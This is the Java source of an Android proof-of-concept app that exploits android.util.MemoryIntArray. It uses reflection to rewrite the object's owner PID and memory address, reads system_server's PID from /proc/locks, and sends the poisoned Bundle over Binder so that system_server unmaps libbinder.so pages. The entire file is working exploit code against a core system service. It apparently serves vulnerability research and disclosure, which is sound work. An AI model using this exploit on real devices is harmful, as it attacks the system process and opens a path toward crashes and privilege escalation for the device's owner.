package com.example.laginimaineb.memoryintarraypoc;

import android.app.ActivityManager;
import android.app.Notification;
import android.app.NotificationManager;
import android.content.Context;
import android.content.pm.ActivityInfo;
import android.graphics.Bitmap;
import android.graphics.drawable.Icon;
import android.location.LocationManager;
import android.os.IBinder;
import android.os.MemoryFile;
import android.os.Parcel;
import android.os.ParcelFileDescriptor;
import android.os.Parcelable;
import android.print.PageRange;
import android.support.v7.app.AppCompatActivity;
import android.os.Bundle;
import android.system.ErrnoException;
import android.system.Os;
import android.system.StructStat;
import android.util.Log;
import android.widget.TextView;

import java.io.BufferedReader;
import java.io.File;
import java.io.FileDescriptor;
import java.io.FileReader;
import java.io.IOException;
import java.lang.reflect.Field;
import java.lang.reflect.Modifier;
import java.util.NoSuchElementException;
import java.util.Scanner;

import static android.system.OsConstants.O_RDONLY;
import static android.system.OsConstants.O_RDWR;

public class MainActivity extends AppCompatActivity {

    // Used to load the 'native-lib' library on application startup.
    static {
        System.loadLibrary("native-lib");
    }

    /**
     * The size of the ashmem region used.
     */
    private static final int ASHMEM_SIZE = 0x10000;

    /**
     * The logtag used.
     */
    private static final String TAG = "MemoryIntArrayPoc";

    /**
     * The command code used when transferring a Bundle to be unparcelled.
     */
    private static final int CONVERT_TO_TRANSLUCENT_TRANSACTION = IBinder.FIRST_CALL_TRANSACTION+174;

    /**
     * Calls ASHMEM_SET_SIZE on the given file descriptor.
     * @param fd The descriptor
     * @param size The new size of the descriptor
     * @return The result of the ASHMEM_SET_SIZE ioctl
     */
    public native int setAshmemSize(int fd, int size);

    /**
     * Finds the base address for the given library.
     * @param library The library to search for.
     * @return The base address for the given library or 0 if the library wasn't found.
     */
    public native long getLibraryAddress(String library);

    /**
     * Reads the given file fully.
     * @param file The file to read.
     * @return The string contents of the file.
     * @throws IOException If the file couldn't be read.
     */
    private static String readFully(File file) throws IOException {
        StringBuilder builder = new StringBuilder();
        BufferedReader reader = null;
        try {
            reader = new BufferedReader(new FileReader(file));
            String line;
            while ((line = reader.readLine()) != null)
                builder.append(line).append('\n');
            return builder.toString();
        } finally {
            if (reader != null)
                try {
                    reader.close();
                } catch (IOException ex) {
                    //Nothing more we can do at this point
                }
        }
    }

    /**
     * Attempts to unmap the region at the given address in system_server.
     * @param array The MemoryIntArray instance to be modified and parcelled.
     * @param addr The address at which to point the MemoryIntArray instance.
     * @param pid The PID used as the ownerPid field. If this matches system_server's PID, it will
     *            cause it to unmap the region.
     * @throws Exception If the exploit couldn't be executed.
     */
    public void tryUnmap(Object array, long addr, int pid) throws Exception {

        //Changing the PID to the given PID
        Field accessFlagsField = Field.class.getDeclaredField("accessFlags");
        accessFlagsField.setAccessible(true);
        Field ownerPidField = array.getClass().getDeclaredField("mOwnerPid");
        ownerPidField.setAccessible(true);
        accessFlagsField.setInt(ownerPidField, accessFlagsField.getInt(ownerPidField) & ~Modifier.FINAL);
        ownerPidField.setInt(array, pid);

        //Changing the memory address to a chosen address
        Field memoryAddrField = array.getClass().getDeclaredField("mMemoryAddr");
        memoryAddrField.setAccessible(true);
        accessFlagsField.setInt(memoryAddrField, accessFlagsField.getInt(memoryAddrField) & ~Modifier.FINAL);
        memoryAddrField.setLong(array, addr);

        //Putting the poisoned object in a bundle
        final Bundle bundle = new Bundle(array.getClass().getClassLoader());
        bundle.putParcelable("obj", (Parcelable)array);

        //Sending out the poisoned request
        IBinder amBinder = (IBinder)Class.forName("android.os.ServiceManager").getMethod("getService", String.class).invoke(null, "activity");
        Parcel reply = Parcel.obtain();
        Parcel data = Parcel.obtain();
        data.writeInterfaceToken("android.app.IActivityManager");
        data.writeStrongBinder((IBinder)this.getClass().getMethod("getActivityToken").invoke(this));
        data.writeInt(1); //is bundle present?
        data.writeBundle(bundle);
        try {
            amBinder.transact(CONVERT_TO_TRANSLUCENT_TRANSACTION, data, reply, 0);
        } catch (Exception ex) {}


        //Cleanup
        reply.recycle();
        data.recycle();
    }

    /**
     * Finds the PID of system_server from the /proc/locks file (as it is the first process
     * to acquire a lock). This is a bit of a roundabout way, but it seems to work reliably.
     * @return The PID of system_server.
     * @throws IOException If the locks file couldn't be read.
     */
    private static int getSystemServerPid() throws IOException{
        String[] locks = readFully(new File("/proc/locks")).split("\n");
        String lastLock = locks[locks.length - 1];
        String[] tokens = lastLock.split("\\s+");
        return Integer.parseInt(tokens[4]);
    }

    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        setContentView(R.layout.activity_main);

        //Creating an instance of the MemoryIntArray
        //We intentionally keep a reference to this object to prevent it from being GCed
        Object arr;
        try {
            Class arrClass = Class.forName("android.util.MemoryIntArray");
            arr = arrClass.getDeclaredConstructor(int.class, boolean.class).newInstance(512, true);

            //Replacing the descriptor in the MemoryIntArray with a new controlled ashmem FD
            //This is just to get around the pesky maximal size constraint
            FileDescriptor desc = Os.open("/dev/ashmem", O_RDWR, O_RDWR);
            final int fd = (int)desc.getClass().getMethod("getInt$").invoke(desc);
            setAshmemSize(fd, ASHMEM_SIZE);
            Field mFdField = arr.getClass().getDeclaredField("mFd");
            mFdField.setAccessible(true);
            mFdField.set(arr, fd);

        } catch (Exception ex) {
            Log.e(TAG, "Failed to create MemoryIntArray instance", ex);
            return;
        }

        //Unmapping the first few pages of libbinder.so
        try {
            long addr = getLibraryAddress("libbinder.so");
            int systemServerPid = getSystemServerPid();
            Log.i(TAG, "Memory address is: 0x" + Long.toHexString(addr));
            Log.i(TAG, "system_server pid is: " + systemServerPid);
            tryUnmap(arr, addr, systemServerPid);
        } catch (Exception ex) {
            Log.e(TAG, "Failed to run exploit", ex);
        }

    }
}
